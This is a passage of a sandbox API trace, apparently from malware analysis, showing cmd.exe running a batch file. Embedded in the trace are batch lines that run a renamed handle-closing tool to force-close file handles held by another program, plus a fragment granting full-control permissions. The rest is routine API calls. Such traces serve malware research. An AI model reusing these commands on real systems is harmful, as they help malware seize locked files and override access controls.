hHeap=0x410000) returned 1 [0172.167] GetProcessHeap () returned 0x410000 [0172.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426180 | out: hHeap=0x410000) returned 1 [0172.167] GetProcessHeap () returned 0x410000 [0172.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4277f0 | out: hHeap=0x410000) returned 1 [0172.167] GetProcessHeap () returned 0x410000 [0172.167] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x411240 | out: hHeap=0x410000) returned 1 [0172.168] _get_osfhandle (_FileHandle=3) returned 0x78 [0172.168] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0172.168] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef160, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x1ef160*=0xa3, lpOverlapped=0x0) returned 1 [0172.168] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0172.168] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0172.168] _get_osfhandle (_FileHandle=3) returned 0x78 [0172.168] GetFileType (hFile=0x78) returned 0x1 [0172.168] _get_osfhandle (_FileHandle=3) returned 0x78 [0172.168] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0172.169] GetProcessHeap () returned 0x410000 [0172.169] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400a) returned 0x434ab0 [0172.169] GetProcessHeap () returned 0x410000 [0172.169] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x70) returned 0x411240 [0172.169] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x1ee8f0, lpFilePart=0x1ee8e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x1ee8e8*="Ch81ANBE.bat") returned 0x32 [0172.169] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ee604 | out: lpFindFileData=0x1ee604*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x426180 [0172.170] FindClose (in: hFindFile=0x426180 | out: hFindFile=0x426180) returned 1 [0172.170] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ee604 | out: lpFindFileData=0x1ee604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x426180 [0172.170] FindClose (in: hFindFile=0x426180 | out: hFindFile=0x426180) returned 1 [0172.170] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0172.170] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ee604 | out: lpFindFileData=0x1ee604*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x426180 [0172.170] FindClose (in: hFindFile=0x426180 | out: hFindFile=0x426180) returned 1 [0172.171] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x1ee604 | out: lpFindFileData=0x1ee604*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x426180 [0172.171] FindClose (in: hFindFile=0x426180 | out: hFindFile=0x426180) returned 1 [0172.171] GetProcessHeap () returned 0x410000 [0172.171] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x56) returned 0x426180 [0172.171] GetProcessHeap () returned 0x410000 [0172.171] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x434ab0 | out: hHeap=0x410000) returned 1 [0172.173] _tell (_FileHandle=3) returned 78 [0172.173] _close (_FileHandle=3) returned 0 [0172.173] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1eef34 | out: _Buffer="\r\n") returned 2 [0172.173] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.173] GetFileType (hFile=0x7) returned 0x2 [0172.175] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.175] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeef4 | out: lpMode=0x1eeef4) returned 1 [0172.175] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.175] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1eef20, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1eef20*=0x2) returned 1 [0172.177] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0172.177] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0172.177] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1eef30 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0172.177] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x1eef30 | out: _Buffer=">") returned 1 [0172.178] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.178] GetFileType (hFile=0x7) returned 0x2 [0172.178] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.178] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeef8 | out: lpMode=0x1eeef8) returned 1 [0172.179] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.179] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x1eef24, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x1eef24*=0x26) returned 1 [0172.179] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.179] GetFileType (hFile=0x7) returned 0x2 [0172.180] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.180] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef17c | out: lpMode=0x1ef17c) returned 1 [0172.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.180] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x410dc0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef1a8, lpReserved=0x0 | out: lpBuffer=0x410dc0*, lpNumberOfCharsWritten=0x1ef1a8*=0x2) returned 1 [0172.181] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef1b4 | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0172.181] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.181] GetFileType (hFile=0x7) returned 0x2 [0172.182] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.182] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef174 | out: lpMode=0x1ef174) returned 1 [0172.182] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.182] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x1ef1a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1a0*=0x2d) returned 1 [0172.184] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef1d4 | out: _Buffer="\r\n") returned 2 [0172.184] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.184] GetFileType (hFile=0x7) returned 0x2 [0172.185] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.185] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef194 | out: lpMode=0x1ef194) returned 1 [0172.185] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.185] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef1c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1c0*=0x2) returned 1 [0172.187] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0172.187] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0172.187] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0172.187] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0172.187] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0172.187] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0172.187] GetConsoleTitleW (in: lpConsoleTitle=0x1eed44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.188] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.188] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.188] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1eeb00, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1eeaf8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1eeaf8*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.189] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ee89c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0172.189] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x1ee89c, lpFilePart=0x1ee898 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x1ee898*=0x0) returned 0x26 [0172.189] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0172.189] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ee618 | out: lpFindFileData=0x1ee618*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4264c0 [0172.189] FindClose (in: hFindFile=0x4264c0 | out: hFindFile=0x4264c0) returned 1 [0172.190] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ee618 | out: lpFindFileData=0x1ee618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x4264c0 [0172.190] FindClose (in: hFindFile=0x4264c0 | out: hFindFile=0x4264c0) returned 1 [0172.190] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0172.190] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ee618 | out: lpFindFileData=0x1ee618*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4264c0 [0172.190] FindClose (in: hFindFile=0x4264c0 | out: hFindFile=0x4264c0) returned 1 [0172.190] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0172.190] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0172.191] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0172.191] GetProcessHeap () returned 0x410000 [0172.191] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x429648 | out: hHeap=0x410000) returned 1 [0172.191] GetEnvironmentStringsW () returned 0x428ac0* [0172.191] GetProcessHeap () returned 0x410000 [0172.191] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb7c) returned 0x429648 [0172.191] FreeEnvironmentStringsW (penv=0x428ac0) returned 1 [0172.191] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0172.191] GetProcessHeap () returned 0x410000 [0172.191] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426460 | out: hHeap=0x410000) returned 1 [0172.191] GetProcessHeap () returned 0x410000 [0172.191] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426400 | out: hHeap=0x410000) returned 1 [0172.191] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.191] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.192] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.192] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0172.192] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.192] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0172.192] SetConsoleInputExeNameW () returned 0x1 [0172.193] GetConsoleOutputCP () returned 0x1b5 [0172.193] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0172.193] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.193] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef17c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0172.194] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0172.194] _get_osfhandle (_FileHandle=3) returned 0x78 [0172.194] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0172.194] GetProcessHeap () returned 0x410000 [0172.194] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426390 | out: hHeap=0x410000) returned 1 [0172.194] GetProcessHeap () returned 0x410000 [0172.194] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426320 | out: hHeap=0x410000) returned 1 [0172.194] GetProcessHeap () returned 0x410000 [0172.194] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4262b0 | out: hHeap=0x410000) returned 1 [0172.194] GetProcessHeap () returned 0x410000 [0172.194] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426240 | out: hHeap=0x410000) returned 1 [0172.194] GetProcessHeap () returned 0x410000 [0172.194] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x410db8 | out: hHeap=0x410000) returned 1 [0172.194] GetProcessHeap () returned 0x410000 [0172.194] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4261e0 | out: hHeap=0x410000) returned 1 [0172.194] GetProcessHeap () returned 0x410000 [0172.195] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426180 | out: hHeap=0x410000) returned 1 [0172.195] GetProcessHeap () returned 0x410000 [0172.195] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x411240 | out: hHeap=0x410000) returned 1 [0172.195] _get_osfhandle (_FileHandle=3) returned 0x78 [0172.195] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0172.195] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef160, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x1ef160*=0x94, lpOverlapped=0x0) returned 1 [0172.195] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0172.196] _get_osfhandle (_FileHandle=3) returned 0x78 [0172.196] GetFileType (hFile=0x78) returned 0x1 [0172.196] _get_osfhandle (_FileHandle=3) returned 0x78 [0172.196] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0172.196] GetProcessHeap () returned 0x410000 [0172.196] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400a) returned 0x434ab0 [0172.196] GetProcessHeap () returned 0x410000 [0172.196] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4008) returned 0x438ac8 [0172.197] GetProcessHeap () returned 0x410000 [0172.197] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x410db8 [0172.197] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"spcwin.exe\"") returned 0xc [0172.197] GetProcessHeap () returned 0x410000 [0172.197] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x410db8 | out: hHeap=0x410000) returned 1 [0172.197] GetProcessHeap () returned 0x410000 [0172.197] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x438ac8 | out: hHeap=0x410000) returned 1 [0172.197] GetProcessHeap () returned 0x410000 [0172.197] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x434ab0 | out: hHeap=0x410000) returned 1 [0172.205] _tell (_FileHandle=3) returned 226 [0172.205] _close (_FileHandle=3) returned 0 [0172.205] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1eef34 | out: _Buffer="\r\n") returned 2 [0172.205] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.206] GetFileType (hFile=0x7) returned 0x2 [0172.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.495] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeef4 | out: lpMode=0x1eeef4) returned 1 [0172.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.496] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1eef20, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1eef20*=0x2) returned 1 [0173.226] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0173.226] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0173.226] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1eef30 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0173.227] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x1eef30 | out: _Buffer=">") returned 1 [0173.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.227] GetFileType (hFile=0x7) returned 0x2 [0173.227] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.227] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeef8 | out: lpMode=0x1eeef8) returned 1 [0173.228] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.228] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x1eef24, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x1eef24*=0x26) returned 1 [0173.229] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x1ef1b4 | out: _Buffer="FOR") returned 3 [0173.229] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.229] GetFileType (hFile=0x7) returned 0x2 [0173.229] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.230] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef174 | out: lpMode=0x1ef174) returned 1 [0173.230] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.230] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x1ef1a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1a0*=0x3) returned 1 [0173.231] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x1ef1b4 | out: _Buffer=" /F") returned 3 [0173.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.231] GetFileType (hFile=0x7) returned 0x2 [0173.231] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.232] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef174 | out: lpMode=0x1ef174) returned 1 [0173.232] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.232] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x1ef1a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1a0*=0x3) returned 1 [0173.233] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x1ef1b4 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0173.233] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.233] GetFileType (hFile=0x7) returned 0x2 [0173.233] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.233] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef174 | out: lpMode=0x1ef174) returned 1 [0173.234] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.234] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x1ef1a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1a0*=0x20) returned 1 [0173.235] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x1ef1b4 | out: _Buffer=" %I IN ") returned 7 [0173.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.235] GetFileType (hFile=0x7) returned 0x2 [0173.235] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.235] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef174 | out: lpMode=0x1ef174) returned 1 [0173.236] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.236] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1ef1a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1a0*=0x7) returned 1 [0173.238] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x1ef1b0 | out: _Buffer="(`tdq963ii.exe -accepteula \"spcwin.exe\" -nobanner`) DO ") returned 55 [0173.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.238] GetFileType (hFile=0x7) returned 0x2 [0173.239] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.239] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef170 | out: lpMode=0x1ef170) returned 1 [0173.239] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.239] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x37, lpNumberOfCharsWritten=0x1ef19c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef19c*=0x37) returned 1 [0173.240] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.240] GetFileType (hFile=0x7) returned 0x2 [0173.240] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.240] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef17c | out: lpMode=0x1ef17c) returned 1 [0173.241] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.241] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1ef1a8, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x1ef1a8*=0x1) returned 1 [0173.241] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.241] GetFileType (hFile=0x7) returned 0x2 [0173.242] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.242] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef160 | out: 